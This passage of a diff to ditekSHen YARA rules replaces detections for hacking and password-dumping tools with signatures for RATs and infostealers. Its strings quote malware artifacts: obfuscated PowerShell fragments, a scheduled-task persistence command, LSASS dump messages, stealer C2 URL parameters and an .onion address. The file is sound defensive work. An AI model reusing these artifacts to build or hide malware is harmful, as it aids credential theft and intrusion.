-		$pdb1 = "\\Network Administrator" ascii
-		$pdb2 = "\\Binaries\\Plugins\\Tools\\RPCService.pdb" ascii
-		$s1 = "CIntelliAdminRPC" fullword wide
-		$s2 = "IntelliAdmin RPC Service" fullword wide
-		$s3 = "IntelliAdmin Remote Execute v" ascii
-		$s4 = "IntelliAdminRPC" fullword ascii
+		$x1 = "<Janela>k__" ascii
+		$x2 = "janela" fullword ascii
+		$x3 = "\\CSHARP\\RAT\\" ascii
+		$s1 = "<SystemInfos>k__" ascii
+		$s2 = "<SendKeepAlives>b__" ascii
+		$s3 = "hookStruct" fullword ascii
+		$s4 = "[^a-zA-Z]" fullword wide
+		$s5 = "GetRecycled" fullword ascii
+		$s6 = "import \"bcl.proto\";" wide
+		$s7 = "\\KL_FINAL\\" ascii
+		$s8 = "\\KL_FASEAVAST" ascii
+		$s9 = "\\kl c++" ascii
+		$s10 = "VisaoAPP" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $pdb* ) or 2 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 2 of ( $x* ) and 3 of ( $s* ) ) or ( 1 of ( $x* ) and 5 of ( $s* ) ) or ( 6 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PET_Sharpwmi : FILE
+rule DITEKSHEN_MALWARE_Win_Qwixxrat : FILE
 {
 	meta:
-		description = "Detects SharpWMI"
+		description = "Detects QwixxRAT. Uses ToxicEye / TelegramRAT as base (MALWARE_Win_TelegramRAT)"
 		author = "ditekSHen"
-		id = "9c58d9fa-04b8-5a9c-8ae9-ff2e7530772f"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "0a8f2f6f-aa78-56c2-aca0-d575fbf0b91e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L604-L619"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10941-L10953"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e6c5764d0883e2882e06f07e4729362011a4d65614259b85978e1c6ef5cfadb7"
+		logic_hash = "e6e44697e393da35215f7835f122cb74b05dbeebb558345d5110d6fbc809f4dd"
 		score = 75
-		quality = 73
+		quality = 50
 		tags = "FILE"
 
 	strings:
-		$s1 = "scriptKillTimeout" fullword ascii
-		$s2 = "RemoteWMIExecuteWithOutput" fullword ascii
-		$s3 = "RemoteWMIFirewall" fullword ascii
-		$s4 = "iex([char[]](@({0})|%{{$_-bxor{1}}}) -join '')" fullword wide
-		$s5 = "\\\\{0}\\root\\subscription" fullword wide
-		$s6 = "_Context##RANDOM##" fullword wide
-		$s7 = "executevbs" fullword wide
-		$s8 = "scriptb64" fullword wide
+		$s1 = /Qwixx(\s)?Stealer/ ascii wide
+		$s2 = "discord.gg/UXVFHzTjYe" wide
+		$s3 = "t.me/QwixxTwixx" wide
+		$s4 = "Secret Qwixx" wide
+		$s5 = "\\Qwixx Rat\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and 2 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_PET_Defendercontrol : FILE
+rule DITEKSHEN_MALWARE_Win_Toxiceye : FILE
 {
 	meta:
-		description = "Detects Defender Control"
+		description = "Detects ToxicEye / TelegramRAT. Observed used as the basis for many infostealers"
 		author = "ditekSHen"
-		id = "7bc1f26e-2432-5642-b1e7-c87683f7d932"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "99304f11-2444-5864-b174-514bb5bef0f7"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L621-L631"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10955-L10973"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "826ed0643a07580750eb11c4cf2c2759f53b6c2bda51705476edc4808abccbf8"
+		logic_hash = "ee01c107dd295b923801c0d1a77b1534d3a5f2abf8d2cfa93c6786a1b0553504"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "Windows Defender Control" wide
-		$s2 = "www.sordum.org" wide ascii
-		$s3 = "dControl" wide
+		$s1 = "[~] Handling command" wide
+		$s2 = "[?] Sleeping {0}" wide
+		$s3 = "GETPASSWORDS" wide
+		$s4 = "FORKBOMB" wide
+		$s5 = "SENDKEYPRESS" wide
+		$s6 = "KEYLOGGER" wide
+		$s7 = "/ToxicEye/master/TelegramRAT/" wide
+		$s8 = "desktopScreenshot" ascii
+		$s9 = "MeltFile" ascii
+		$s10 = "AutoStealer" ascii
+		$s11 = /\/LimerBoy\/(ToxicEye|Adamantium-Thief|hackpy)/ wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of them
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_PET_Mulit_Venomagent : FILE
+rule DITEKSHEN_MALWARE_Win_Rdpcredsstealerinjector : FILE
 {
 	meta:
-		description = "Detects Venom Proxy Agent"
+		description = "Detects RDP Credentials Stealer injector"
 		author = "ditekSHen"
-		id = "598bc773-cbe9-503b-ba3e-27c2cde8910d"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "221b7d64-6585-5f3a-bffa-bde05390db73"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L633-L645"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10994-L11007"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5eda23a237404a44dc9eb057adbf6106166374168eb08e55c182da5c05ecb4f1"
+		logic_hash = "0dfade8dde987f5134158b7c4abc3eaf8dcece86e1ff2ab1da4466da316939a2"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav1 = "MALWARE.Win.Trojan.RDPCredsStealer-Injector"
 
 	strings:
-		$s1 = "github.com/Dliv3/Venom/" ascii
-		$s2 = "3HpKQVB3nT3qaNQPT-ZU/SKJ55ofz5TEmg5O3ROWA/CUs_-gfa04tGVO633Z4G/OSeEpRRb0Sq_5R6ArIi-" ascii
-		$s3 = "venom_agent -" ascii
-		$s4 = "bufferssh-userauthtransmitfileunknown portwirep: p->m= != sweepgen" ascii
-		$s5 = "golang.org/x/crypto/ssh.(*handshakeTransport).readPacket"
+		$s1 = "\\APIHookInjectorBin\\" ascii
+		$s2 = "\\RDPCredsStealerDLL.dll" ascii
+		$s3 = "DLL Injected" ascii
+		$s4 = "Code Injected" ascii
+		$s5 = /(OpenProcess|VirtualAllocEx|CreateRemoteThread)\(\) failed:/ fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf ) and 3 of them
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_HFS_Webserver : FILE
+rule DITEKSHEN_MALWARE_Win_Krakenstealer : FILE
 {
 	meta:
-		description = "Detects HFS Web Server"
+		description = "Detect Kraken infostealer"
 		author = "ditekSHen"
-		id = "2c9d9a38-8a6c-5c53-84bc-4eef77933172"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "460eb574-99c9-5f78-9efa-7a8808aaaae7"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L647-L658"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11009-L11030"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f5b8947e3858466dae5f476790842500f8184c4676d8c0c4870adb7fd3206652"
+		logic_hash = "7f15823db706e6e51d8ea58fb026efb49f42234255d2f448614dc645d12648bb"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
+		snort = "923828002"
 
 	strings:
-		$s1 = "SOFTWARE\\Borland\\Delphi\\" ascii
-		$s2 = "C:\\code\\mine\\hfs\\scriptLib.pas" fullword ascii
-		$s3 = "hfs.*;*.htm*;descript.ion;*.comment;*.md5;*.corrupted;*.lnk" ascii
-		$s4 = "Server: HFS" ascii
+		$x1 = /Kraken(_)?(Stub|Keyboard|Clipboard|GeneratorMachine|PostLogs|Screenshot|Keylogs|Password)/ ascii wide
+		$s1 = /(get|set)_(Clipboard|Keyboard|Screen)Recorder/ fullword ascii
+		$s2 = /Dumping(FileZilla|360_China|Opera|Epic|CocCoc|Thunderbird|Brave)/ fullword ascii
+		$s3 = "ScreenPostData" fullword ascii
+		$s4 = "encrypt_data" fullword ascii
+		$s5 = "KeyboardProc" fullword ascii
+		$s6 = "UploadsKeyboard" fullword ascii
+		$s7 = "ClpUploader" fullword ascii
+		$s8 = "StartKeylogger" fullword ascii
+		$s9 = "ClipoDetectedRemover" fullword ascii
+		$s10 = "Disable_Regis" fullword ascii
+		$s11 = "RecordedClips" fullword ascii
+		$s12 = "HoneyPotStatus" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or 9 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PROX_Lanproxy : FILE
+rule DITEKSHEN_MALWARE_Win_Whiffyrecon : FILE
 {
 	meta:
-		description = "Detects lanproxy-go-client"
+		description = "Detects Whiffy Recon"
 		author = "ditekSHen"
-		id = "71fc23d9-9aae-5666-832b-90cf5a86c474"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "19b0f327-06ee-5f78-abac-9c4fbcad98ac"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L660-L675"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11032-L11052"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "13a5aaea0fb522e3badb4a60d2db8d7dd46e5721bd6dc2e2b2e29d49e197c375"
+		logic_hash = "58df9f47f5890c5e31d352be682c6164a940dad206ad29c54c43f70d3afb9543"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "serverShare" fullword ascii
-		$s2 = "parkingOnChan" fullword ascii
-		$s3 = "{{join .Names \", \"}}{{\"\\t\"}}{{.Usage}}{{end}}{{end}}{{end}}{{end}}{{" ascii
-		$s4 = "</table></thead></tbody>" fullword ascii
-		$s5 = "value=aacute;abreve;addressagrave;alt -> andand;angmsd;angsph;any -> apacir;approx;articleatilde;barvee;barwed;bdoUxXvbecaus;ber" ascii
-		$s6 = "/dev/urandom127.0.0.1:" ascii
-		$s7 = "non-IPv4 addressnon-IPv6 addressntrianglelefteq;object is remotepacer: H_m_prev=reflect mismatchregexp: Compile(remote I/O error" ascii
-		$s8 = ".WithDeadline(.in-addr.arpa." ascii
+		$s1 = "WLANSVC" fullword wide
+		$s2 = "f02fe1c0-137a-4802-8881-55dd300c5022" fullword wide
+		$s3 = "\\wlan.lnk" fullword wide
+		$s4 = "str-12.bin" wide
+		$s5 = "/geolocation/v1/geolocate?key=" wide
+		$s6 = "/wlan" fullword wide
+		$s7 = "/scanned" fullword wide
+		$s8 = "/bots/" fullword wide
+		$s9 = "wlan.pdb" fullword ascii
+		$s10 = "botId" fullword ascii
+		$s11 = "wifiAccessPoints" fullword ascii
+		$s12 = "considerIp" fullword ascii
+		$s13 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and 6 of them
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_PET_Peirates : FILE
+rule DITEKSHEN_MALWARE_Win_Quiterat : FILE
 {
 	meta:
-		description = "Detects Kubernetes penetration tool Peirates"
+		description = "Detects QuiteRAT"
 		author = "ditekSHen"
-		id = "74ce83ed-0d93-5cb0-97e8-6885ae83b336"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "54f7b899-3418-5074-8138-38cf073cda8c"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L677-L694"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11054-L11068"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "321f06af098283638f99d027dc3c95a25a72192a25c7afa5081a7dbff8c3acb7"
+		logic_hash = "257f9151294254e3e86979f184963f0396587438393b11bad068ba0f386cfc4a"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "DeprecatedServiceAccount" fullword ascii
-		$s2 = "LivenessProbe" fullword ascii
-		$s3 = "\\t\\tkubectl expose rs nginx --port=80 --target-port=8000" ascii
-		$s4 = "\\t\\tkubectl run hazelcast --image=hazelcast --port=5701" ascii
-		$s5 = "COMPREPLY[$i]=${COMPREPLY[$i]#\"$colon_word\"}" ascii
-		$s6 = "%*polymorphichelpers.HistoryViewerFunc" ascii
-		$s7 = "ListenAndServeTLS" ascii
-		$s8 = "DownwardAPI" ascii
-		$s9 = "; plural=(n%10==1 && n%100!=11 ? 0 : n != 0 ? 1 : 2);proto:" ascii
-		$s10 = "name: attack-" ascii
+		$x1 = "< No Pineapple! >" ascii
+		$x2 = ".?AVPineapple" ascii
+		$x3 = ".?AVApple@@" ascii
+		$s1 = "XgsdCwsRFxZF" ascii
+		$s2 = "XggZChkVRQ==" ascii
+		$s3 = "RxUZERQRHEU=" ascii
+		$s4 = "XhkbDBEXFkU" ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and 9 of them
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $x* ) and 1 of ( $s* ) ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PET_Botb : FILE
+rule DITEKSHEN_MALWARE_PWSH_CUMII
 {
 	meta:
-		description = "Detects Break out the Box (BOtB)"
+		description = "Detects multi-dropper PowerShell"
 		author = "ditekSHen"
-		id = "acafa6dd-51b9-5945-b1df-7763a97a424f"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "07b77251-1d79-5521-8c05-ecfc662f45cb"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L696-L710"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11070-L11086"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a01f796b27852f9217d9bfea32f8d9ffb3c88521d4413f6612f7a0544cf44fb3"
+		logic_hash = "ab9e59b0552718928d170a988d129b38352700076847f2f409976016858864eb"
 		score = 75
 		quality = 75
-		tags = "FILE"
+		tags = ""
+		clamav = "ditekSHen.MALWARE.PWSH.CUMII"
 
 	strings:
-		$s1 = "to unallocated span%%!%c(*big.Float=%s), RecursionDesired: /usr/share/zoneinfo//{Bucket}/{Key+}?acl/{Bucket}?accelerate/{Bucket}?encryption/{Bucket}?" ascii
-		$s2 = "exploit CVE-2019-5736 with command: [ERROR] In Enabling CGROUP Notifications -> 'echo 1 > [INFO] CGROUP may exist, attempting exploit regardless" ascii
-		$s3 = "main.execShellCmd" ascii
-		$s4 = "[*] Data uploaded to:[+]" ascii
-		$s5 = "whitespace or line breakfailed to find credentials in the environment.failed to get %s EC2 instance role credentialsfirst" ascii
-		$s6 = "This process will exit IF an EXECVE is called in the Container or if the Container is manually stoppedPerform reverse DNS lookups" ascii
-		$s7 = "http: request too largehttp://100.100.100.200/http://169.254.169.254/index out of range" ascii
+		$s1 = ".('{1}{$}'.replace('$','0')" ascii nocase
+		$s2 = ",'I').replace('!','ex')" ascii nocase
+		$s3 = "'.replace('*','0001')" ascii nocase
+		$s4 = "Remove-Item $" ascii nocase
+		$s5 = "the File will start cumiing" ascii nocase
+		$b1 = "011001100111010101101110011*" ascii
+		$b2 = "0101001000*1110110*010011111" ascii
+		$b3 = "01001101010110101001*11*0000" ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and 6 of them
+		(3 of ( $s* ) and 1 of ( $b* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_LSASS_Createminidump : FILE
+rule DITEKSHEN_MALWARE_Win_Agnianestealer : FILE
 {
 	meta:
-		description = "Detects CreateMiniDump tool"
+		description = "Detects Agniane infostealer"
 		author = "ditekSHen"
-		id = "0d8642d1-2ed9-5270-a54a-6ba788026f5f"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "fcbbf748-dc01-579f-a6f8-37e0f3dea35e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L712-L724"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11088-L11114"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "577ccc783554363c0bed80d9642e8a0f107fc2ec66d84f76b9556aa3506c86c0"
+		logic_hash = "0031fbe6d76868819cbcfc638433d60a50e8f5cfd14ff25af88ed3dffefd7d62"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
+		snort = "923828001"
+		clamav = "ditekSHen.MALWARE.Win.AgnianeStealer"
 
 	strings:
-		$s1 = "lsass.dmp" fullword wide
-		$s2 = "lsass dumped successfully!" ascii
-		$s3 = "Got lsass.exe PID:" ascii
-		$s4 = "\\experiments\\CreateMiniDump\\CreateMiniDump\\" ascii
-		$s5 = "MiniDumpWriteDump" fullword ascii
+		$x1 = "Agniane.pdb" ascii
+		$x2 = "IEnumerable<Agniane.Classes.LogRecord>." ascii
+		$x3 = "Agniane Stealer" wide
+		$x4 = "cinoshibot" wide
+		$x5 = "yqbiguuno2zp5jxsmqbev4rwckvy27bqws5cgm3hiid7xolt65j72kqd.onion" wide
+		$s1 = "<Pass encoding=\"base64\">" wide
+		$s2 = "Domain Detect: detected {0}" wide
+		$s3 = "DOMAINDETECTCOOKIES" ascii
+		$s4 = /(Opera|Edge|Chrome|Brave|Vivaldi|Blink|Universal|Gecko|OperaGx|Firefox)Grabber/ fullword ascii
+		$u1 = "/antivm.php?id=" wide
+		$u2 = "/ferr.php?id=" wide
+		$u3 = ".php?ownerid=" wide
+		$u4 = "&buildid=" wide
+		$u5 = "&username=" wide
+		$u6 = "&BSSID=" wide
+		$u7 = "&rndtoken=" wide
+		$u8 = "&domaindetects=" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of them
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and ( 2 of ( $s* ) or 3 of ( $u* ) ) ) or ( all of ( $s* ) and 3 of ( $u* ) ) or ( 7 of ( $u* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Securityxploded_Browserpassworddumper : FILE
+rule DITEKSHEN_MALWARE_Win_TOITOIN_Kritaloader : FILE
 {
 	meta:
-		description = "Detects SecurityXploded Browser Password Dumper tool"
+		description = "Detects TOITOIN KritaLoader"
 		author = "ditekSHen"
-		id = "ce90ef96-43c0-5d68-ba7d-21aafb3f754b"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "5ff002fc-1108-554e-9de6-92d568826d1d"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L726-L737"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11116-L11127"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b3c6e9b393c244c7bf6489f54ebd622a09da050a65d6dbde325d5bcd7d85f39a"
+		logic_hash = "9629a4cfa606812d2579c0c0d486dec5971854e5133f0594a4638db5b89c3135"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav = "ditekSHen.MALWARE.Win.Trojan.TOITOIN"
 
 	strings:
-		$s1 = "\\projects\\windows\\BrowserPasswordDump\\Release\\FireMaster.pdb" ascii
-		$s2 = "%s: Dumping passwords" fullword ascii
-		$s3 = "%s - Found login data file...dumping the passwords from file %s" fullword ascii
-		$s4 = "%s Dumping secrets from login json file %s" fullword ascii
+		$p1 = ":\\Trabalho_2023\\OFF_2023\\" ascii
+		$p2 = "DLL_Start_OK.pdb" ascii
+		$s1 = "krita_main" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $p* ) and 1 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Securityxploded_Ftppassworddumper : FILE
+rule DITEKSHEN_MALWARE_Win_TOITOIN_Injectordll : FILE
 {
 	meta:
-		description = "Detects SecurityXploded FTP Password Dumper tool"
+		description = "Detects TOITOIN InjectorDLL"
 		author = "ditekSHen"
-		id = "d876c201-b527-531c-9563-0b1a1c6334cb"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "40776e0a-29df-52ea-8486-35027ab31a1b"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L739-L750"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11129-L11141"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "941bfb9b1ce71252c5aa05bd654bdcf1af6cc1d5f720bc2c239e17454f15beda"
+		logic_hash = "fc80c702305657ba1058ca7f55579d1d5254dd0f619c5f7fda7886a868b65c93"
 		score = 75
-		quality = 75
+		quality = 25
 		tags = "FILE"
+		clamav = "ditekSHen.MALWARE.Win.Trojan.TOITOIN"
 
 	strings:
-		$s1 = "\\projects\\windows\\FTPPasswordDump\\Release\\FireMaster.pdb" ascii
-		$s2 = "//Dump all the FTP passwords to a file \"c:\\passlist.txt\"" ascii
-		$s3 = "//Dump all the FTP passwords to console" ascii
-		$s4 = "FTP Password Dump" fullword wide
+		$p1 = ":\\Trabalho_2023\\OFF_2023\\" ascii
+		$p2 = "DLL_START_IN.pdb" ascii
+		$s1 = ".ini" fullword ascii
+		$s2 = "\\users\\Public\\Documents\\" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $p* ) and all of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Securityxploded_Emailpassworddumper : FILE
+rule DITEKSHEN_MALWARE_Win_TOITOIN_Downloader : FILE
 {
 	meta:
-		description = "Detects SecurityXploded Email Password Dumper tool"
+		description = "Detects TOITOIN Downloader"
 		author = "ditekSHen"
-		id = "25e140de-4a0a-5d4f-a93f-a414b9879f2b"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "0282ea26-e381-5c9a-9dad-c90246d8add0"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L752-L764"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11143-L11154"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7f07611385d45bf45bfb8ee95e56febfb992fb7b416321c5b590878636a5c1b7"
+		logic_hash = "d7e5e99c9266ec144152c3d1066e0e1a862f48ded17fab8f504192ca48219826"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav = "ditekSHen.MALWARE.Win.Trojan.TOITOIN"
 
 	strings:
-		$s1 = "\\projects\\windows\\EmailPasswordDump\\Release\\FireMaster.pdb" ascii
-		$s2 = "//Dump all the Email passwords to a file \"c:\\passlist.txt\"" ascii
-		$s3 = "EmailPasswordDump" fullword wide
-		$s4 = "//Dump all the Email passwords to console" ascii
-		$s5 = "Email Password Dump" fullword wide
+		$p1 = ":\\Trabalho_2023\\OFF_2023\\" ascii
+		$s1 = { 20 2f 63 20 22 [6-15] 63 00 6d 00 64 00 00 00 6f 00 70 00 65 00 6e }
+		$o1 = { 48 83 fa 10 72 34 48 8b 8d 10 ?? 00 00 48 ff c2 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_PET_Sharpsphere : FILE
+rule DITEKSHEN_MALWARE_Win_Venomrat : FILE
 {
 	meta:
-		description = "Detects SharpSphere red teamers tool to interact with the guest operating systems of virtual machines managed by vCenter"
+		description = "Detects VenomRAT"
 		author = "ditekSHen"
-		id = "878b5174-2368-5fc8-9573-7b2759cab409"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "93cd5ae3-c222-51a2-bbb9-bdd3254006e5"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L766-L783"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11156-L11170"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "aae9355fcc7a6b5faf3807c85983032519550e936d5660c823d13731083be512"
+		logic_hash = "47d343def76a323c66db4ba6fb1c0d119f45323f9b7f36695e4aeb7b070819d7"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "get_virtualExecUsage" fullword ascii
-		$s2 = "Command to execute" fullword ascii
-		$s3 = "<guestusername>k__" ascii
-		$s4 = ".VirtualMachineDeviceRuntimeInfoVirtualEthernetCardRuntimeState" ascii
-		$s5 = "datastoreUrl" ascii
-		$s6 = "SharpSphere.vSphere." ascii
-		$s7 = "HelpText+vCenter SDK URL, i.e. https://127.0.0.1/sdk" ascii
-		$s8 = "[x] Execution finished, attempting to retrieve the results" fullword wide
-		$s9 = "C:\\Windows\\System32\\cmd.exe" fullword wide
-		$s10 = "C:\\Users\\Public\\" fullword wide
+		$x1 = "Venom RAT + HVNC" fullword ascii
+		$x2 = "Venom" fullword ascii
+		$x3 = "VenomByVenom" fullword wide
+		$s1 = "/c schtasks /create /f /sc onlogon /rl highest /tn \"" fullword wide
+		$s2 = "UmVjZWl2ZWQ" wide
+		$s3 = "Pac_ket" fullword wide
+		$s4 = "Po_ng" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) and 2 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Exchangeexploit : FILE
+rule DITEKSHEN_MALWARE_Win_Sapphirestealer : FILE
 {
 	meta:
-		description = "Hunt for executables potentially embedding Exchange Server exploitation artificats"
+		description = "Detects SapphireStealer"
 		author = "ditekSHen"
-		id = "429f738a-009a-5326-92e0-bdc907be96f2"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "ed6cffe4-23f1-5791-b07d-75abb698c899"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
